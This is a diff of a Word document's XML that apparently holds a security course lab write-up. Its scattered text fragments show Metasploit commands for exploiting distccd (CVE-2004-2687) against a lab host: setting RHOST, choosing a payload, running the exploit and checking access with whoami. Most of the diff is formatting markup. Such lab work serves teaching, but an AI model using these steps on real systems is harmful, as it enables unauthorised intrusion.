+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
+          <w:color w:val="333333"/>
+          <w:spacing w:val="3"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>exploi</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -1044,19 +966,9 @@
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
           <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
-          <w:lang w:val="en-US"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="CourierNewPSMT" w:hAnsi="CourierNewPSMT" w:cs="CourierNewPSMT"/>
-          <w:color w:val="000000"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:br/>
-      </w:r>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
@@ -1066,11 +978,64 @@
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
           <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
-          <w:lang w:val="en-US"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>- Search and run the distccd exploit</w:t>
-      </w:r>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">set </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
+          <w:color w:val="333333"/>
+          <w:spacing w:val="3"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">RHOST </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
+          <w:color w:val="333333"/>
+          <w:spacing w:val="3"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体" w:hint="eastAsia"/>
+          <w:color w:val="333333"/>
+          <w:spacing w:val="3"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>192.168.23.13</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
+          <w:color w:val="333333"/>
+          <w:spacing w:val="3"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>2</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -1101,10 +1066,22 @@
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
           <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
-          <w:lang w:val="en-US"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
+          <w:color w:val="333333"/>
+          <w:spacing w:val="3"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>exploit</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -1135,82 +1112,9 @@
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
           <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
-          <w:lang w:val="en-US"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
-          <w:color w:val="333333"/>
-          <w:spacing w:val="3"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
-          <w:lang w:val="en-US"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve">set </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
-          <w:color w:val="333333"/>
-          <w:spacing w:val="3"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
-          <w:lang w:val="en-US"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve">RHOST </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
-          <w:color w:val="333333"/>
-          <w:spacing w:val="3"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
-          <w:lang w:val="en-US"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体" w:hint="eastAsia"/>
-          <w:color w:val="333333"/>
-          <w:spacing w:val="3"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
-          <w:lang w:val="en-US"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>192.168.23.13</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
-          <w:color w:val="333333"/>
-          <w:spacing w:val="3"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
-          <w:lang w:val="en-US"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>2</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
     </w:p>
     <w:p>
       <w:pPr>
@@ -1241,7 +1145,6 @@
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
           <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
-          <w:lang w:val="en-US"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
       </w:pPr>
@@ -1254,10 +1157,9 @@
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
           <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
-          <w:lang w:val="en-US"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>exploit</w:t>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">RHOST stands for Remote Host and it is required in order for this module to run the </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1289,10 +1191,35 @@
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
           <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
-          <w:lang w:val="en-US"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体" w:hint="eastAsia"/>
+          <w:color w:val="333333"/>
+          <w:spacing w:val="3"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>e</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
+          <w:color w:val="333333"/>
+          <w:spacing w:val="3"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">rror: </w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -1323,7 +1250,6 @@
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
           <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
-          <w:lang w:val="en-US"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
       </w:pPr>
@@ -1336,10 +1262,10 @@
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
           <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
-          <w:lang w:val="en-US"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve">RHOST stands for Remote Host and it is required in order for this module to run the </w:t>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>exploit failed a payload has not been selected</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1364,14 +1290,13 @@
           <w:tab w:val="left" w:pos="14656"/>
         </w:tabs>
         <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体" w:hint="eastAsia"/>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
           <w:color w:val="333333"/>
           <w:spacing w:val="3"/>
           <w:kern w:val="0"/>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
           <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
-          <w:lang w:val="en-US"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
       </w:pPr>
@@ -1405,7 +1330,6 @@
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
           <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
-          <w:lang w:val="en-US"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
       </w:pPr>
@@ -1418,10 +1342,9 @@
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
           <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
-          <w:lang w:val="en-US"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>e</w:t>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>s</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -1432,10 +1355,9 @@
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
           <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
-          <w:lang w:val="en-US"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve">rror: </w:t>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>how payloads</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1467,7 +1389,6 @@
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
           <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
-          <w:lang w:val="en-US"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
       </w:pPr>
@@ -1480,10 +1401,9 @@
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
           <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
-          <w:lang w:val="en-US"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>exploit failed a payload has not been selected</w:t>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>set payload 0</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1508,17 +1428,29 @@
           <w:tab w:val="left" w:pos="14656"/>
         </w:tabs>
         <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体" w:hint="eastAsia"/>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
           <w:color w:val="333333"/>
           <w:spacing w:val="3"/>
           <w:kern w:val="0"/>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
           <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
-          <w:lang w:val="en-US"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
+          <w:color w:val="333333"/>
+          <w:spacing w:val="3"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>exploit</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -1542,202 +1474,41 @@
           <w:tab w:val="left" w:pos="14656"/>
         </w:tabs>
         <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体" w:hint="eastAsia"/>
+          <w:rStyle w:val="fontstyle01"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
           <w:color w:val="333333"/>
           <w:spacing w:val="3"/>
           <w:kern w:val="0"/>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
           <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
-          <w:lang w:val="en-US"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体" w:hint="eastAsia"/>
-          <w:color w:val="333333"/>
-          <w:spacing w:val="3"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
-          <w:lang w:val="en-US"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>s</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
-          <w:color w:val="333333"/>
-          <w:spacing w:val="3"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
-          <w:lang w:val="en-US"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>how payloads</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:shd w:val="clear" w:color="auto" w:fill="F7F7F7"/>
-        <w:tabs>
-          <w:tab w:val="left" w:pos="916"/>
-          <w:tab w:val="left" w:pos="1832"/>
-          <w:tab w:val="left" w:pos="2748"/>
-          <w:tab w:val="left" w:pos="3664"/>
-          <w:tab w:val="left" w:pos="4580"/>
-          <w:tab w:val="left" w:pos="5496"/>
-          <w:tab w:val="left" w:pos="6412"/>
-          <w:tab w:val="left" w:pos="7328"/>
-          <w:tab w:val="left" w:pos="8244"/>
-          <w:tab w:val="left" w:pos="9160"/>
-          <w:tab w:val="left" w:pos="10076"/>
-          <w:tab w:val="left" w:pos="10992"/>
-          <w:tab w:val="left" w:pos="11908"/>
-          <w:tab w:val="left" w:pos="12824"/>
-          <w:tab w:val="left" w:pos="13740"/>
-          <w:tab w:val="left" w:pos="14656"/>
-        </w:tabs>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
-          <w:color w:val="333333"/>
-          <w:spacing w:val="3"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
-          <w:lang w:val="en-US"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
-          <w:color w:val="333333"/>
-          <w:spacing w:val="3"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
-          <w:lang w:val="en-US"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>set payload 0</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:shd w:val="clear" w:color="auto" w:fill="F7F7F7"/>
-        <w:tabs>
-          <w:tab w:val="left" w:pos="916"/>
-          <w:tab w:val="left" w:pos="1832"/>
-          <w:tab w:val="left" w:pos="2748"/>
-          <w:tab w:val="left" w:pos="3664"/>
-          <w:tab w:val="left" w:pos="4580"/>
-          <w:tab w:val="left" w:pos="5496"/>
-          <w:tab w:val="left" w:pos="6412"/>
-          <w:tab w:val="left" w:pos="7328"/>
-          <w:tab w:val="left" w:pos="8244"/>
-          <w:tab w:val="left" w:pos="9160"/>
-          <w:tab w:val="left" w:pos="10076"/>
-          <w:tab w:val="left" w:pos="10992"/>
-          <w:tab w:val="left" w:pos="11908"/>
-          <w:tab w:val="left" w:pos="12824"/>
-          <w:tab w:val="left" w:pos="13740"/>
-          <w:tab w:val="left" w:pos="14656"/>
-        </w:tabs>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
-          <w:color w:val="333333"/>
-          <w:spacing w:val="3"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
-          <w:lang w:val="en-US"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
-          <w:color w:val="333333"/>
-          <w:spacing w:val="3"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
-          <w:lang w:val="en-US"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>exploit</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:shd w:val="clear" w:color="auto" w:fill="F7F7F7"/>
-        <w:tabs>
-          <w:tab w:val="left" w:pos="916"/>
-          <w:tab w:val="left" w:pos="1832"/>
-          <w:tab w:val="left" w:pos="2748"/>
-          <w:tab w:val="left" w:pos="3664"/>
-          <w:tab w:val="left" w:pos="4580"/>
-          <w:tab w:val="left" w:pos="5496"/>
-          <w:tab w:val="left" w:pos="6412"/>
-          <w:tab w:val="left" w:pos="7328"/>
-          <w:tab w:val="left" w:pos="8244"/>
-          <w:tab w:val="left" w:pos="9160"/>
-          <w:tab w:val="left" w:pos="10076"/>
-          <w:tab w:val="left" w:pos="10992"/>
-          <w:tab w:val="left" w:pos="11908"/>
-          <w:tab w:val="left" w:pos="12824"/>
-          <w:tab w:val="left" w:pos="13740"/>
-          <w:tab w:val="left" w:pos="14656"/>
-        </w:tabs>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+      <w:r>
         <w:rPr>
           <w:rStyle w:val="fontstyle01"/>
         </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
-          <w:color w:val="333333"/>
-          <w:spacing w:val="3"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
-          <w:lang w:val="en-US"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:br/>
-      </w:r>
-      <w:r>
+        <w:t>- Verify that you are in (e.g., by running whoami)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:rPr>
           <w:rStyle w:val="fontstyle01"/>
         </w:rPr>
-        <w:t>- Verify that you are in (e.g., by running whoami)</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rStyle w:val="fontstyle01"/>
-        </w:rPr>
       </w:pPr>
     </w:p>
     <w:p>
       <w:r>
         <w:rPr>
           <w:noProof/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
+        </w:rPr>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5169FDA6" wp14:editId="5DEF0068">
             <wp:extent cx="5494351" cy="2155476"/>
@@ -1775,8 +1546,6 @@
         </w:drawing>
       </w:r>
     </w:p>
-    <w:p/>
-    <w:p/>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="1"/>
@@ -1785,108 +1554,174 @@
         <w:t xml:space="preserve">Problem2 </w:t>
       </w:r>
     </w:p>
-    <w:p/>
-    <w:p>
-      <w:pPr>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="3"/>
+      </w:pPr>
+      <w:r>
         <w:rPr>
           <w:rStyle w:val="fontstyle01"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:t>Vim root/</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="fontstyle01"/>
-        </w:rPr>
-        <w:t>you_are_pwned</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="fontstyle01"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rStyle w:val="fontstyle01"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="fontstyle01"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Cs230 </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="fontstyle01"/>
-        </w:rPr>
-        <w:t>1337 haxx0r</w:t>
-      </w:r>
-    </w:p>
-    <w:p/>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="2"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="fontstyle01"/>
-        </w:rPr>
-        <w:t>text documen</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="fontstyle01"/>
-        </w:rPr>
-        <w:t>t</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:hyperlink r:id="rId12" w:tgtFrame="_blank" w:history="1">
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>text document</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
+          <w:color w:val="858585"/>
+          <w:spacing w:val="3"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
+          <w:color w:val="858585"/>
+          <w:spacing w:val="3"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>C</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
+          <w:color w:val="858585"/>
+          <w:spacing w:val="3"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve">VE1 : </w:t>
+      </w:r>
+      <w:r>
+        <w:t> </w:t>
+      </w:r>
+      <w:hyperlink r:id="rId12" w:tooltip="CVE-2004-2687 security vulnerability details" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="a7"/>
+            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+            <w:b/>
+            <w:bCs/>
+            <w:color w:val="0066FF"/>
+          </w:rPr>
+          <w:t>CVE-2004-2687</w:t>
+        </w:r>
+      </w:hyperlink>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
+          <w:color w:val="858585"/>
+          <w:spacing w:val="3"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Exploit CVE 2004-2687; </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
+          <w:color w:val="858585"/>
+          <w:spacing w:val="3"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>distcc</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
+          <w:color w:val="858585"/>
+          <w:spacing w:val="3"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 2.x, as used in </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
+          <w:color w:val="858585"/>
+          <w:spacing w:val="3"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>XCode</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
+          <w:color w:val="858585"/>
+          <w:spacing w:val="3"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
